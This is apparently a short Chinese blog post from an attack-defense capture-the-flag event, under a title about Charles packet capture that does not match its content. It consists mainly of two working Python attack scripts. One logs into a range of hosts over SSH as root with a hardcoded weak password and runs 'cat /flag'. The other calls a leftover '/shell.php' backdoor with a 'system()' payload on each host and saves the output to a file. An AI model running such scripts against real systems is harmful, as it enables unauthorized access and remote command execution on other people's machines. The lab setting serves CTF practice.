Charles 手机抓包
736 2023-04-03 04:06:17
环境:
描述:存在某些队伍忘记修改SSH弱口令,尝试使用python脚本连接获取flag
import paramiko #paramiko是一个用于做远程控制的模块import threading #threading模块是Python里面常用的线程模块def ssh2(ip,username,passwd,cmd): try: ssh=paramiko.SSHClient() #创建一个ssh对象 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #自动选择yes ssh.connect(ip,22,username,passwd,timeout=0.1) #连接服务器 for m in cmd: stdin,stdout,stderr=ssh.exec_command(m) #执行操作 out=stdout.readlines() #获取命令执行的结果 for o in out: print(o) print('%s\tOK\n'%(ip)) ssh.close() except: print('%s\tError\n'%(ip))if __name__=='__main__': cmd=['cat /flag'] username='root' passwd='lxh198998' threads=[10] for i in range(149,151): ip='192.168.75.'+str(i) a=threading.Thread(target=ssh2,args=(ip,username,passwd,cmd)) a.start()
描述:存在某些队伍靶机检测没有做到位,导致遗留后门,利用python脚本检测并加以利用
import requestspart_url='/shell.php?pass=system(%27cat /flag%27);'for s in range(149,151): try: ip1='192.168.75.'+str(s) ip='http://'+ip1+part_url print(ip) res=requests.get(url=ip,timeout=0.1) if res.status_code!=404: print(ip1) with open('flag.txt','a') as f: f.write(ip1+' '+res.text) except Exception as e: pass
脚本执行成功后会在当前目录下生成一个flag.txt存储flag
或者使用bash
命令行单独查看